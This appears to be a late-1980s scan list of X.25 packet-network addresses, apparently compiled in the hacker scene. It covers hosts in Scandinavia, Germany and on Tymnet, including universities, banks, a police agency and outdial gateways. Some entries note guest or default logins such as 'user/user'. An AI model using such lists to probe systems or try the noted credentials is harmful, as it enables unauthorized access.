+A 0240 200 002 05                  Uppsala STUNS VAX/UNIX KULING
+I 0240 200 044 4        ENEA       ENEA
+A 0240 200 100 110                 Stockholm QZ/DEC-10
+A 0240 200 100 120                 Stockholm QZ/CD Cyber 730
+O 0240 200 100 203                 Uppsala, UU, Teknikum, NORD 100/500
+A 0240 200 100 205                 Uppsala, UU, Stuns, VAX 750
+A 0240 200 100 206                 Uppsala, UDAC/DECnet RTR18A
+O 0240 200 100 207                 Uppsala, UDAC, Cyber 835
+A 0240 200 100 228                 Uppsala, UDAC/UPNET - Terminalnaet
+A 0240 200 100 232                 Uppsala, UDAC, IBM/GUTS (BASF 7/68 ?)
+O 0240 200 100 28                  Uppsala Upnet
+? 0240 200 100 30                  Umeaa VAX-750 Skogsh. Umeaa Univ
+A 0240 200 100 303                 Umeaa, UMDAC/BIOVAX
+A 0240 200 100 304                 Umeaa, Skogshoegskolan, VAX 750
+A 0240 200 100 305                 Umeaa, UMDAC/DECnet RTR09A, (Vax 11/750)
+A 0240 200 100 30520               Umeaa, UMDAC/BASUN
+A 0240 200 100 30540               Umeaa, UMDAC/UTB1 (Vax 11/780)
+A 0240 200 100 30550               Umeaa, UMDAC/UTB2 (Vax 11/750)
+A 0240 200 100 30570               Umeaa, UMDAC/OSTVAX (Vax 11/780, Hoegsk i
+                                   Oe-sund)
+A 0240 200 100 307                 Umeaa, UMDAC/Cyber 850
+D 0240 200 100 312                 Luleaa, Tekn hoegsk, NORD 100
+D 0240 200 100 313                 Luleaa, Tekn hoegsk, NORD 100
+A 0240 200 100 328                 Umeaa, UMDAC/NUNET - Terminalnaet
+D 0240 200 100 33                  Umeaa VAX-11/780
+A 0240 200 100 403                 Linkoeping, ULi/LIUIDA, uVAX-I
+D 0240 200 100 404                 Linkoeping, ULi/PDP 11/23 BULL
+A 0240 200 100 405                 Linkoeping, LIDAC, VAX 11/780 VIKTOR
+A 0240 200 100 407                 Linkoeping, LIDAC/DECnet RTR13A, uVAX-II
+D 0240 200 100 432                 Linkoeping, LIDAC/TEXAS - Terminalnaet
+A 0240 200 100 7                   Primenet
+A 0240 200 101 903                 Stockholm, SU, Psykologi, Prime 750
+A 0240 200 101 904                 Stockholm, QZ IBM (Amdahl)
+A 0240 200 101 905                 Stockholm, QZ, NFRVAX
+A 0240 200 101 907                 Stockholm, QZ/DECnet RTR08A
+A 0240 200 101 914                 Stockholm, SU, Fysik, Vax 780
+D 0240 200 101 926                 Stockholm, KTH/KTHNET - Terminalnaet
+A 0240 200 101 928                 Stockholm, QZ/QZNET - Terminalnaet
+O 0240 200 102 06                  Uppsala UDAC uVAX-II RTR18A
+O 0240 200 102 07                  Uppsala CD Cyber 835
+A 0240 200 102 7                   Stockholm DEC-10/Janus
+A 0240 200 102 71                  Stockholm DEC-10/Janus
+A 0240 200 201 603                 Goeteborg, CTH, Infobeh, VAX 750, Unix
+D 0240 200 201 604                 Goeteborg, GU, Pedagogiska inst, Prime 550
+A 0240 200 201 605                 Goeteborg, GU, Statistiska inst, Prime 550
+D 0240 200 201 606                 Goeteborg, CTH, Tillaempad Elektronik, VAX
+                                   750
+A 0240 200 201 607                 Goeteborg, Tillaempad Elektronik/DECnet
+                                   RTR31A (RTR18A ?)
+A 0240 200 201 628                 Goeteborg, GD/GUCNET - Terminalnaet
+D 0240 200 201 632                 Goeteborg Upnod
+A 0240 200 205 4                   SCB
+A 0240 200 278 0                   Oerebro, Hoegskolan, Prime
+A 0240 200 292 6                   Karlstad, Hoegskolan, VAX 11/780
+D 0240 200 310 204                 Lund, Fysikum, NORD 500, Lucas
+O 0240 200 310 206                 Lund, Maxlab, NORD 100
+A 0240 200 310 207                 Lund, LDC/DECnet RTR46A, uVAX-II
+A 0240 200 310 20720               Lund, LDC/GEMINI, Vax 8350
+A 0240 200 310 228                 Lund, LDC/LUNET - Terminalnaet
+  0240 201 001 30                  Stockholm QZ/Amdahl
+  0240 201 002 03                  Uppsala Teknikum Nord 100/500
+  0240 5                SWEDEN     Swedish data network (Telepak)
+I 0240 500 025 3        QZXB       QZ by yet another route
+I 0240 500 025 7                   Stockholm, DEC, VAX
+I 0240 501 50                      Scannet, Goteborg
+I 0240 501 51                      Scannet, Helsingfors
+I 0240 501 52                      Stockholm KTH/TTDS
+I 0240 501 531 0        QZCOM      QZ-COM - Stockholm University DEC-10
+I 0240 501 532 0        QZCB       QZ Cyber
+I 0240 501 533 0        QZIB       QZ Amdahl
+I 0240 501 54           UPPS       Uppsala network, Sweden
+I 0240 501 550 3                   Gottenburg, Sweden
+I 0240 501 582 8        LUND       Lund University
+I 0240 501 60                      Helsinki CP9500 HYLK B7800
+I 0240 502 00                      Scannet, Stockholm
+I 0240 502 01                      Denmark, Copenhagen Scannet
+I 0240 502 02                      Tandem Computers
+I 0240 502 032 8        QZXA       QZ Sweden via reverse PAD (=UPNET?)
+I 0240 502 032 832                 Oden, Sweden
+I 0240 502 033 2        QZDA       QZ DEC-10 Sweden
+I 0240 502 04                      Prime Computers
+I 0240 502 05                      Vaesteraas PAD ASEA Multics
+I 0240 502 52                      KEMIDATA
+I 0240 502 53           QZXB       QZ by yet another route
+  0240 515 330                     Amdahl
+  0242                  N          Norway
+  0242 2                NORWAY     Norwegian data network (Datapak/Norpak)
+  0242 192 010 1013                PSS DOC
+X 0242 211 000 00107    OSLO       DEC-1099 DEC-net/PSI at Oslo University
+D 0242 211 000 001*D02             Oslo univ BRU-nett UNINETT
+D 0242 211 000 001*D03  OSLO       DEC-10 at Oslo University
+D 0242 211 000 00100               Oslo univ DEC-1099 UNINETT
+D 0242 211 000 002                 Oslo Scannet NSI Nord-100
+D 0242 211 000 01018    DATAPIN    DATAPAK Info - Norway
+B 0242 211 000 074                 Oslo VAX
+T 0242 223 000 00151    RBK        Cyber 170 at IFE (Energy Research Centre)
+T 0242 223 000 001*D00  RBK        Cyber 170 at IFE, Kjeller RBK UNINETT
+D 0242 223 000 002                 Kjeller FFI UNINETT
+D 0242 245 000 00101    BERGEN     Univac at Bergen University (UNINETT)
+D 0242 245 000 001*D00  BERGEN     Univac at Bergen University
+A 0242 245 013 4                   BBB Mailbox (Bergen By Byte)
+  0242 253 000 001*D11             Trondheim UNINETT RUNIT UNIVAC
+T 0242 253 000 00101    RNI        Univac at Trondheim University
+X 0242 253 000 00103               Trondheim RUNIT UNINETT VAX-780 (=PUNIT
+                                   (EANNET) ?)
+T 0242 253 000 00104               Trondheim NLHT UNINETT VAX-750
+  0242 265 000 001*D00             Tromso UNINETT U of Tromso, Cyber 171
+  0242 253 000 001*D11  RUNIT      Univac at Trondheim University
+  0242 265 000 001*D81             Tromso UNINETT U of Tromso, NORD-10
+  0242 265 000 001*D82             Tromso UNINETT U of Tromso, NORD-100
+  0242 265 000 001*D83             Tromso UNINETT U of Tromso, NORD-500
+  0242 265 000 00101    TROMSOE    Cyber 170 at Tromsoe University (UNINETT)
+  0242 265 000 001*D81  TROMSO     ELAN at Tromsoe University
+X 0242 265 000 106                 PORTACOM (PORTACOM)
+  0244                  SF         Finland
+  0244 2                           Datapak (Finpak)
+A 0244 202 006                     Economics HP 3000
+A 0244 202 007                     University of Helsinki, B7800 (=CANDE ?)
+A 0244 202 008                     VTKK (Staten DC) IBM 360
+A 0244 202 012                     U o Helsinki Mopo Mikko3
+A 0244 203 008          HELVA      High Energy Physics Vax 11/750
+A 0244 203 017                     U of Technology DEC-20
+D 0244 231 006                     Technical University of Tampere VAX
+A 0244 253 001                     Tech U of Lappeenranta VAX/VMS
+A 0244 261 001                     U of Vaasa VAX/VMS
+A 0244 273 002                     University of Joensuu VAX
+D 0248 321 321                     DWENT-SDC Search Service
+  0262                  D          Germany
+  0262 3                           Euronet
+X 0262 307 4                       INFAS
+  0262 4                GERMANY    German data network (Datex-P)
+I 0262 428 462 10706
+I 0262 428 479 11065
+D 0262 432 210 43002               Apple
+Ar0262 432 210 93001               Quick-Com
+Y 0262 442 010 49132
+O 0262 442 110 40325               OKI
+Y 0262 442 110 49130               PAD Frankfurt
+Y 0262 442 110 49133
+Y 0262 442 110 49230
+I 0262 442 151 40327               KIS (info)
+I 0262 442 210 49331
+A 0262 442 210 90371               elma-mailbox (~pim)
+Y 0262 442 210 99632
+O 0262 442 310 40312               Bibliothek  Chemie
+I 0262 442 310 90306               Chemie
+I 0262 442 410 40341    RMI        RMI Mailbox Aachen
+I 0262 442 433 40307               CMES
+O 0262 442 461 40343
+Y 0262 443 000 49234
+A 0262 443 000 90314               ?
+Y 0262 443 000 99131
+I 0262 444 000 90314               CCC Hamburg (Clinch), Hackerbox (1 line...)
+Y 0262 444 000 90330               Allgemeine Bank der Niederlande
+O 0262 444 000 90342               Batig Beteiligungen GmbH
+A 0262 444 000 90374               Master Control System (MCS) Hamburg
+Y 0262 444 000 99132
+Y 0262 444 441 40317               Osnabrueck, Driverstr.24, 2848 Vechta
+I 0262 445 110 30317               Metereologie
+I 0262 445 110 90323               Bibliothek
+I 0262 446 154 40371               DECATES - Oberramstadt
+Y 0262 446 210 49330
+Y 0262 446 810 49131
+Y 0262 446 810 49132
+O 0262 446 900 30331               IBD Online Frankfurt a.M.
+I 0262 446 900 40318               Chemie
+Y 0262 446 900 49231
+Y 0262 446 900 49232
+I 0262 446 900 90286               RZ
+Y 0262 446 900 99133
+O 0262 447 071 10303               Organische Chem.
+Y 0262 447 110 49134
+I 0262 447 114 9236                Emery
+I 0262 447 127 90344
+Y 0262 447 310 40313               Online-Literaturdok.
+A 0262 447 531 40310               Chemie
+I 0262 448 136                     Luma Uni
+O 0262 448 136 90323               Genesys EDV-Systeme
+Y 0262 448 210 49630
+A 0262 448 900 30368               Phoenix
+Y 0262 448 900 49130
+A 0262 448 900 90313               Max Planck Institut
+Y 0262 448 900 90341               LMU Bibliothek
+Y 0262 448 900 99632
+I 0262 449 310 90312               Apel Hans-Joerg
+I 0262 452 000 21721               ???
+I 0262 450 000 90184
+I 0262 451 104 2301
+O 0262 452 010 40116               AEG-Telefunken
+I 0262 452 010 40179               RZ Uni Essen
+I 0262 452 020 40120               Apotheke Dr.Schiemes
+I 0262 452 080 40381               DVO Datenverarbeitung
+I 0262 452 090 832                 ?
+I 0262 452 101 30030               3M Mailbox
+I 0262 452 101 40030               3M Mailbox
+I 0262 452 110 40001               RZU Duesseldorf (ND100)
+I 0262 452 110 40005               CIERR 1402
+I 0262 452 110 40016               ADV-Orga-Meyer & Co.
+I 0262 452 110 40018               ADV-Orga-Meyer & Co.
+Ar0262 452 110 40026               Primenet Stadt Duesseldorf,
+I 0262 452 110 40063               ADAC
+I 0262 452 110 40080               Uni Duesseldorf
+Dr0262 452 110 40099
+D 0262 452 110 40105               RZU Duesseldorf (Siemens 7.570)
+D 0262 452 110 40123               Data General
+Ar0262 452 110 40130
+Dr0262 452 110 40132
+A 0262 452 110 40134               MCKDU VM/SP
+I 0262 452 110 40211               Applid-Data-Research
+I 0262 452 110 40325               OKI-GmbH
+I 0262 452 110 90371               Software-Express
+I 0262 452 210 0
+Yr0262 452 210 40002               DIMDI Fep 1 Koeln
+Ar0262 452 210 40004               Primenet (MicroVMS V4.5)
+A 0262 452 210 40006               DIMDI Fep 2 Koeln  (Medical docs)
+I 0262 452 210 40015               Kaufhof AG
+I 0262 452 210 40027               ADAC
+Ar0262 452 210 40035               Primenet
+A 0262 452 210 40104               DIMDI1  (German Med. Inst., Koeln)
+Yr0262 452 210 40119
+O 0262 452 210 40136               AEG-Telefunken
+I 0262 452 210 40202               Allianz RZ
+I 0262 452 210 40203               Allianz RZ
+I 0262 452 210 90265               RZ Uni Koeln
+I 0262 452 210 90304               Allianz RZ
+I 0262 452 210 90305               Allianz RZ
+I 0262 452 210 90349               Kaufhof AG (RZ 2)
+D 0262 452 210 90510               Geophysik und Meteorologie
+Ir0262 452 210 93001               ?
+A 0262 452 241 24104               VAX
+A 0262 452 241 24105               GMD2
+A 0262 452 241 24134               GMDZI
+A 0262 452 280 40082               GMD (TSO)
+A 0262 452 280 40187    BNVA       Bonn VAX (PI)
+Ar0262 452 280 40191               Infas GmbH (VM)
+D 0262 452 280 90020               Amtsgericht
+A 0262 452 310 40003    EMX1       EMEX-Mailbox (Guest)
+I 0262 452 310 40017               Primenet
+O 0262 452 310 40103               AEG-Telefunken
+A 0262 452 310 42100               Informatik
+A 0262 452 310 42144    UNIDO      University of Dortmund
+I 0262 452 310 40017               Primenet
+I 0262 452 310 45100               Uni Dortmund (Siemens 7.760)
+A 0262 452 310 9304                Dortmund
+D 0262 452 340 40140               Primenet = RZU Bochum (CDL 855) ??
+A 0262 452 340 40194    RUB        Cyber 205 (=855?), Ruhr University - Bochum
+                                   (RUB)
+D 0262 452 410 40149               Aachener + Muenchener Versicherung
+I 0262 452 410 90014               ???
+I 0262 452 410 90528               rmi-aachen
+A 0262 452 410 90832               RMI Datentechnik Aachen
+I 0262 452 433 40307               OPTEL (Ruehlemann-Box)
+I 0262 452 461 90509               Kfz Juelich
+A 0262 452 710 40240               Uni Siegen, FB Physik (VAX 11/750)
+D 0262 452 931 40196               Handwerkskammer (HWK) Arnsberg
+I 0262 453 000 0414                GFC-AG
+D 0262 453 000 20104               Vax
+D 0262 453 000 217      HMI        HMI in Berlin
+A 0262 453 000 21711               Siemens
+A 0262 453 000 21712               Siemens
+A 0262 453 000 21713               Hahn-Meitner-Institut Berlin
+D 0262 453 000 21714               ???
+D 0262 453 000 40013               Uni Berlin
+Y 0262 453 000 40014               GFC AG
+Ar0262 453 000 40023    BERLIN     Tech. Univ. Berlin (Computer Science)
+I 0262 453 000 40027               ADAC
+I 0262 453 000 40112               ABC Barkredit Bank
+I 0262 453 000 40166               David Verlag
+I 0262 453 000 40509               COM-Box Berlin
+A 0262 453 000 20205               CN01
+A 0262 453 000 43109               netmbx, Berlin
+A 0262 453 000 90055               COM.BOX, Berlin
+A 0262 453 000 90864               ? (GUEST)
+I 0262 453 002 17       HMI        Hans Mietner Institute in Berlin
+I 0262 453 004 0023                Uni Berlin
+I 0262 453 210 40017               tymnet-gateway
+I 0262 454 000 30029
+A 0262 454 000 30035               (immediately drops the line)
+A 0262 454 000 30041               COM-PLETE (?) (command prefix is '*')
+A 0262 454 000 30046               (immediately drops the line)
+O 0262 454 000 30071
+A 0262 454 000 30090               (cierr 1402)
+A 0262 454 000 30104               ? ("INVALID COMMAND SYNTAX")
+A 0262 454 000 30105
+A 0262 454 000 30110               Host
+A 0262 454 000 30113               (cierr 1402)
+A 0262 454 000 30138               ? (no reaction)
+D 0262 454 000 30150
+D 0262 454 000 30158
+A 0262 454 000 30175               ? ("INVALID COMMAND SYNTAX")
+D 0262 454 000 30187               E2000 Hamburg VAX
+O 0262 454 000 30201               Hasylab VAX (user/user)
+A 0262 454 000 30202               HERA Magnet Measurement VAX 750 (=Krista
+                                   Cryogenics Control ?)
+A 0262 454 000 30215               ? ("INVALID COMMAND SYNTAX")
+D 0262 454 000 30259
+D 0262 454 000 30261
+A 0262 454 000 30296               DFH2001I
+A 0262 454 000 30502
+I 0262 454 000 30519
+A 0262 454 000 30566               DFH2001I
+O 0262 454 000 30578               Primenet 20.0.4 DREHH
+I 0262 454 000 40014               Hahn Egon RZ !! Code: EBCDIC !!
+I 0262 454 000 40015               ???
+Y 0262 454 000 40042               ???
+D 0262 454 000 40044               Primenet MUF
+I 0262 454 000 40053               SCHERAX
+Y 0262 454 000 40078               ???
+A 0262 454 000 40082               ? (no reaction)
+I 0262 454 000 40103               Airbus
+I 0262 454 000 40109               ???
+I 0262 454 000 40111               BADGER
+D 0262 454 000 40198               Argus IPP-Vax
+I 0262 454 000 43100               ADV-Orga-Meyer & Co.
+A 0262 454 000 50233               Altos Hamburg (althh) (Gast)
+I 0262 454 000 8001     DYVA       MARK J VAX at DESY
+I 0262 454 000 90047               AEG-Telefunken
+A 0262 454 000 90092               Data-General
+A 0262 454 000 90184               Uni Hamburg (VAX) (=UKE?)
+I 0262 454 000 90194               Verbraucherbank AG
+O 0262 454 000 90241               ???
+I 0262 454 000 90258               Desy ( Vax )
+I 0262 454 000 90558               Philips VAX
+D 0262 454 000 90560    EMBLHH     EMBL VAX at Hamburg (Eur.Molecular
+                                   Biol.Lab.)
+I 0262 454 000 905602              ???
+A 0262 454 000 90582               Desy V.24 Switch
+A 0262 454 000 91110               Deutsche Mailbox 1
+A 0262 454 000 91120               Deutsche Mailbox 2
+A 0262 454 000 92210               DESYNET
+A 0262 454 000 9306     DYVA       MARK J VAX at DESY
+D 0262 454 103 90161               Astra Chemicals GmbH
+  0262 454 106 40206               RCA
+A 0262 454 210 40064               COMTES
+O 0262 454 210 40108               AEG-Telefunken
+I 0262 454 210 40145               AEG-Telefunken
+Y 0262 454 210 40244               AEG-Telefunken
+O 0262 454 210 42001               Bremen
+I 0262 454 210 90302               Computerland VAX
+O 0262 454 298 43070               Infex 2
+I 0262 454 310 40545               Kiel IMF
+A 0262 454 410 30033               Uni Oldenburg
+I 0262 454 421 40045               ADV-Orga-Meyer & Co.
+I 0262 454 488 40147               Essmann Getraenke GmbH
+I 0262 455 110 40081               Airbus
+I 0262 455 110 40171               Alli-Frischdienst
+A 0262 455 110 42330               Uni Hannover (VM/370)
+A 0262 455 110 43020               Nachrichtentechnik (VAX)
+I 0262 455 110 701                 Uni Hannover
+A 0262 455 110 90192               ???
+A 0262 455 110 90835               CosmoNet (GAST)
+A 0262 455 110 92200               RZ
+D 0262 455 151 40212               AEG-Telefunken
+I 0262 455 152 90154               Oldenburger Volksbank
+I 0262 455 210 40562               Uni Bielefeld (CGK/TR440)
+I 0262 455 251 90192               Paderborn
+D 0262 455 251 90193               Paderborn
+A 0262 455 251 93020               Uni Paderborn (4.3 BSD UNIX)
+D 0262 455 362 90057               IUM
+I 0262 455 410 40086               Alli-Frischdienst
+I 0262 455 410 40162               RZ
+I 0262 455 410 40560               Bibliothek
+I 0262 455 421 043050              ORION
+A 0262 455 510 32804               Uni Goettingen (choose VAX or IBM)
+I 0262 455 521 90172               Spar & Darlehenskassen
+I 0262 455 818 104                 Anders Frido GmbH
+I 0262 455 910 40094               Essmann Getraenke GmbH
+I 0262 455 931 40095               Ruhr AG
+I 0262 456 061 40097               Polydress Plastic GmbH
+I 0262 456 102 4301                DEC Frankfurt
+I 0262 456 102 90145               Nadler-Werke GmbH
+I 0262 456 103 40332               Amann KG
+I 0262 456 104 0250                Tymnet
+A 0262 456 106 40254               Alfa Service Partner (Primenet)
+I 0262 456 106 90119               Alfa Service Partner
+I 0262 456 110 40009               IBM  Centre for Info and Doc, Germany
+I 0262 456 110 40037               Control Data (Test.-Serv.C4,ZZA201,CDC)
+I 0262 456 110 40076               Autonet
+I 0262 456 110 40105               Nixdorf Computer
+I 0262 456 110 40106               Nixdorf Computer
+I 0262 456 110 40107               CN01
+I 0262 456 110 40187               WAX Bank FRA
+I 0262 456 110 40240               City-Bank FFM (Uni Bochum ??)
+I 0262 456 110 40245               ??
+I 0262 456 110 40250               Tymnet (Id=Information)
+I 0262 456 110 40303               American Express
+I 0262 456 110 40305               American Express
+I 0262 456 110 40311               AMC
+I 0262 456 110 40365               AMP
+I 0262 456 110 90211               Nixdorf Computer
+I 0262 456 110 90212               Nixdorf Computer
+I 0262 456 110 90322               American Express
+I 0262 456 110 90347               American Express
+I 0262 456 121 40207               ADV-Orga-Meyer & Co.
+I 0262 456 121 40217               BKA
+I 0262 456 121 40225               BKA
+I 0262 456 121 90580               BKA
+I 0262 456 131 40138               Uni Mainz RZ
+I 0262 456 131 40545               RZ
+Y 0262 456 131 90031               Allg.Kreditversicherung
+Y 0262 456 151 40282               ???
+A 0262 456 151 40516               Uni Darmstadt (Siemens 7.xxx)
+A 0262 456 151 40547               GSI Darmstadt (EMMA-VAX 8600)
+A 0262 456 151 42807               GMD Darmstadt (CADMUS 9240)
+I 0262 456 172 90070               A-Kredit
+I 0262 456 193 40082               Apotheken Marketing
+D 0262 456 196 40095               Data General Schwalbach
+A 0262 456 196 40107               Int.Doc.Chem.
+A 0262 456 210 40000               Telebox der DBP (ID INF100,Telebox)
+A 0262 456 210 40014               ACF/VTAM
+A 0262 456 210 40025               Oeva
+A 0262 456 210 40026               HOST
+D 0262 456 210 40027               BASF/FER.VAX 8600
+I 0262 456 210 40097               Nadler-Werke GmbH
+I 0262 456 210 40217               Primenet
+I 0262 456 210 40324               Abacus
+D 0262 456 210 40508               VCON0.BASF.A6
+A 0262 456 210 40516               CN01
+A 0262 456 210 40532
+A 0262 456 210 40580               DYNAPAC MULTI-PAD.25
+A 0262 456 210 40581               DYNAPAC MULTI-PAD.25
+A 0262 456 210 40582
+A 0262 456 210 90000               Telebox der DBP
+I 0262 456 221 3002     EMBL       European Microbiology Lab (or European
+                                   Molecular Biological Lab.) (=ALKOR?)
+D 0262 456 221 40201               DKFZ (Heidelberg)
+I 0262 456 221 40244               Franny (=Max Planck VAX=MPI?)
+I 0262 456 310 40252
+I 0262 456 310 421
+D 0262 456 310 424
+I 0262 456 310 4302
+I 0262 456 340 40136               Nadler-Werke GmbH
+A 0262 456 410 30021               HRZ-Giessen
+I 0262 456 410 40142               Aachener + Muenchener Versicherung
+A 0262 456 410 90040               HRZ Giessen (CDCNET-X.25)
+I 0262 456 410 90828               Ernaehrungswissenschaften
+I 0262 456 441 90335               Leerwe GmbH
+I 0262 456 615 142804              GMD, Darmstadt
+A 0262 456 673 13330               Geonet 1 (ex IMCA)
+A 0262 456 673 13340               Geonet 3
+I 0262 456 673 30070               IMCA-Mailbox, Solmser Str. 16, D-6419
+                                   Haunetal-Staerklos
+I 0262 456 721 40305               Alfa Metalcraft Corp.
+I 0262 456 810 40010               Teleprint Saarbrueckener Zeitung
+I 0262 456 810 40071               Nadler-Werke GmbH
+I 0262 456 810 40076    SAARBRU    Univ of Saarbruecken (Saarland RZ)
+A 0262 456 900 10174               Beilstein Gmelin RZ (COMDOS ?)
+O 0262 456 900 10552               FIZ-Technik
+O 0262 456 900 30040               Nixdorf Computer
+A 0262 456 900 40076               Autonet
+D 0262 456 900 40106               Nixdorf
+I 0262 456 900 40505               AEG-Telefunken
+  0262 456 900 40506               AEG-Telefunken
+A 0262 456 900 90125
+I 0262 456 900 90506               Nixdorf
+I 0262 456 900 9308                SYNTAX
+I 0262 457 010 40025               ?
+A 0262 457 071 40266               Zentrum fuer Datenverarbeitung
+  0262 457 071 40529               Zentrale Verw.
+  0262 457 071 90182               ADW-Wirtschaftsberatung
+D 0262 457 071 90249               Bibliothek
+D 0262 457 110 10023               Hohenheim Bibliothek
+D 0262 457 110 211                 Rechenzentrum
+Dr0262 457 110 40028
+Dr0262 457 110 40035               Primenet !! No CTRL-P clr !!
+B 0262 457 110 40124               Stahl EDV-Service
+  0262 457 110 40129               Allg.Rentenanstalt
+  0262 457 110 40147               MAHU Verlag
+D 0262 457 110 90059               Bibliothek
+  0262 457 110 90103               Data General
+  0262 457 110 90246               Hohenheim DokumentationsSt.
+D 0262 457 110 90316               RMI-Net
+  0262 457 110 90557               Stahl EDV-Service
+A 0262 457 110 90593               Unix, Informatik (ifistg)
+  0262 457 141 90098               Aigner Buchhandlung
+X 0262 457 210 40002               V750
+Br0262 457 210 40025               Badenia
+  0262 457 210 40031               IITB-Datenverarbeitung
+D 0262 457 210 40135               Fraunhofer Institut
+C 0262 457 210 40189               Uni Karlsruhe, RZ (until 10-APR-88)
+X 0262 457 210 40248               Uni Karlsruhe, LINK (=NETONE?)
+A 0262 457 210 42100               Uni Karlsruhe, IRAV2 (VAX 8200)
+A 0262 457 210 42140               Uni Karlsruhe, RZ (since 11-APR-88)
+D 0262 457 210 4303                Telematik
+A 0262 457 247 40001               INKA  FIZ-Chemie 2 (German Centre for
+                                   Tech.?)
+A 0262 457 247 40141               INKA  FIZ-Chemie 1
+A 0262 457 247 40211    CASGER     STN Internat. Karlsruhe
+D 0262 457 310 90269               RZ Bereich OE
+  0262 457 310 921                 RZ
+  0262 457 351 40032               AFD-Arbeitsgruppe F.DV
+A 0262 457 531 90008               Informationswissenschaften
+D 0262 457 531 90094               RZ
+  0262 457 552 90320               Alno-Moebel
+D 0262 457 610 300                 Uni Freiburg, 9600bps
+D 0262 457 610 370                 Uni Freiburg, Sperry Univac
+D 0262 457 610 40079               Albert Ludwig, Uni-Bibliothek
+  0262 457 610 40166               AEG-Telefunken
+  0262 457 610 40306               Alpha-Buch GmbH
+B 0262 457 610 420                 Uni Freiburg, 4800bps
+B 0262 457 610 480                 Uni Freiburg, Sperry Univac
+X 0262 457 610 520                 Uni Freiburg, Uni Bibliothek
+  0262 457 641 40265               Anders Ernst
+  0262 457 721 40071               Kienzle Computer
+  0262 457 721 40072               Kienzle Computer
+  0262 457 721 40171               Kienzle Computer
+  0262 457 721 90004               Kienzle Computer
+  0262 457 721 90226               Kienzle Computer
+  0262 457 810 40222               Dietrich Georg GmbH
+B 0262 458 151 40114               Kejo GmbH (Josef Keller)
+D 0262 458 210 40114               Bibliothek
+  0262 458 210 40120               NCR
+  0262 458 510 30236               Passau RZ
+D 0262 458 710 40171               Transfer Data Test GmbH
+  0310 600 021 0                   Procter and Gamble
+  0310 600 022 6                   Anistics
+  0310 600 022 6                   Interactive Market Systems (Anistics)
+  0310 600 023 2                   Scientific Timesharing
+  0310 600 024 2                   Timesharing Resources
+  0310 600 025 2                   Computer Science Corporation
+  0310 600 025 5                   Timesharing Associates
+  0310 600 027 6                   Management Decision Systems Inc
+  0310 600 028 8                   SRI
+  0310 600 028 8                   SRI San Francisco (UNIX)
+  0310 600 028 8                   Stanford Research Institute (SRI)
+  0310 600 030 3                   Scientific Timesharing
+  0310 600 030 7                   Infomedia Corporation
+  0310 600 032 3                   TRW Defence & Space Systems Group
+  0310 600 040 1                   TMCS Public Network
+  0310 600 043 2                   Interactive Market Systems
+  0310 600 046 6                   Bibliographic Retrieval Services
+B 0310 600 058 1                   BRS
+  0310 600 063 3                   Public TYMNET/TRWNET Interlink
+  0310 600 079 3                   J&J Host
+B 0310 600 105 3
+  0310 600 133 0                   MULTICS, HVN 862-3642
+  0310 600 140 0                   TMCS Public Network
+B 0310 600 150 9                   Orbit (SDC)
+B 0310 600 157 878                 BIX
+D 0310 600 165 9                   BYTE Information Exchange (GUEST,GUEST)
+A 0310 600 166 3                   People Link
+  0310 600 181 9                   TMCS Public Network
+  0310 600 182 8        FRX        Faifax Outdial Host (Tymnet)
+  0310 600 186 4                   SUNGARDS Central Computer Facility Networks
+  0310 600 189 2                   Primenet (certain hours)
+B 0310 600 195 2                   VAX
+B 0310 600 197 6                   Outdial NY
+A 0310 600 197 7
+  0310 600 209 5                   COMODEX Online System
+  0310 600 209 8                   D & B
+  0310 600 209 9                   D & B
+  0310 600 210 0                   D & B
+  0310 600 210 9                   TYMNET/15B (inter-link)
+B 0310 600 220 7,OUT               Outdial
+  0310 600 228 6                   Primenet TFGI
+  0310 600 229 9                   CONSILIUM
+  0310 600 232 901*D    MFE        Magnetic Fusion Energy Centre, Lawrence
+                                   Livermore
+B 0310 600 236 1                   Denver Oil&Gas
+  0310 600 241                     Bank Of America
+  0310 600 245 3                   Primenet
+B 0310 600 254 5        SEISMO     Centre for Seismic Studies
+B 0310 600 255                     Outdial NY
+A 0310 600 262 3                   VAX/VMS (GUEST ???)
+B 0310 600 262 3003                VTINET
+B 0310 600 262 460                 SUMEX
+B 0310 600 263 5                   QUOTRON Wall Street (Boerse n.y.)
+B 0310 600 266 400      SLAC       SLAC on Tymnet
+B 0310 600 267 7                   The New York Times
+  0310 600 269 4                   PVM3101,SPDS/MTAM, MLCM,VM/SP,STRATUS-1,
+                                   STRATUS-2
+  0310 600 279 0                   VM/370
+  0310 600 286 4                   RCA Semicustom
+B 0310 600 302 70000               VTI NETONE
+  0310 600 307 9                   VM/370
+  0310 600 309 2                   TYMNET/Protected Access Service Sys.
+                                   Inter-link
+  0310 600 316 8                   VM/370
+  0310 600 321 4                   VM/370
+  0310 600 322 0                   VM/370
+  0310 600 322 1                   VM/370
+  0310 600 357 2                   NORTH AMERICA DATA CENTRE
+  0310 600 360 4                   VM/370
+  0310 600 404 1                   RCA GLOBCOM'S PACKET SWITCHING SERICE
+A 0310 600 412 9                   ?
+A 0310 600 413 1                   ?
+  0310 600 413 7                   TSO, VM/370
+  0310 600 416 300                 Oakridge, Tennessee
+  0310 600 417 4                   VM/370
+  0310 600 420 6                   MAINSTREAMS
+  0310 600 423 500                 Oakridge, Tennessee
+B 0310 600 430 5                   BIOVAX
+  0310 600 434 1                   (Host) 2 - VM/370, T - VM/370,1,3,4,A,C,E,Z
+A 0310 600 436 5                   Toxnet (NLM=National Lib. of Medicine's)
+B 0310 600 455 5                   VAX
+  0310 600 459 97
+  0310 600 474 3                   TYMNET Info Service
+X 0310 600 502 0                   Outdial Fairfax
+  0310 600 522 9                   Uni.of Pencilvania School of Arts and
+                                   Science
+  0310 600 526 7                   CHANEL 01
+X 0310 600 531 7                   Outdial St.Louis
+B 0310 600 532 0                   DEC Soft. Serv.
+  0310 600 556 9                   STRATUS/32
+  0310 600 557 1                   STRATUS/32
+  0310 600 560 3                   (Host) systems 1,2,3,4,5,C (5=Outdial)
+B 0310 600 562 200      FNAL       Fermilab
+B 0310 600 562 226                 Fermilab 2
+B 0310 600 578 78                  BIX
+B 0310 600 584 401                 Washington Post
+B 0310 600 61           DIALOG1    Lockheed Info Systems
+  0310 600 61*DSDDIPSSL ORBIT2     SDC Search Service
+  0310 600 628 1                   EDCS
+  0310 600 628 3                   EDCS
+  0310 600 643 2                   EASYLINK
+  0310 600 643 4                   EASYLINK
+  0310 600 672 2                   International Network
+  0310 600 68                      Stanford SUMEX-AIM. Tenex op syst.
+  0310 600 683 2                   A&A DATANET (Systems 1,8,0,14)
+X 0310 600 701 7                   Outdial NY
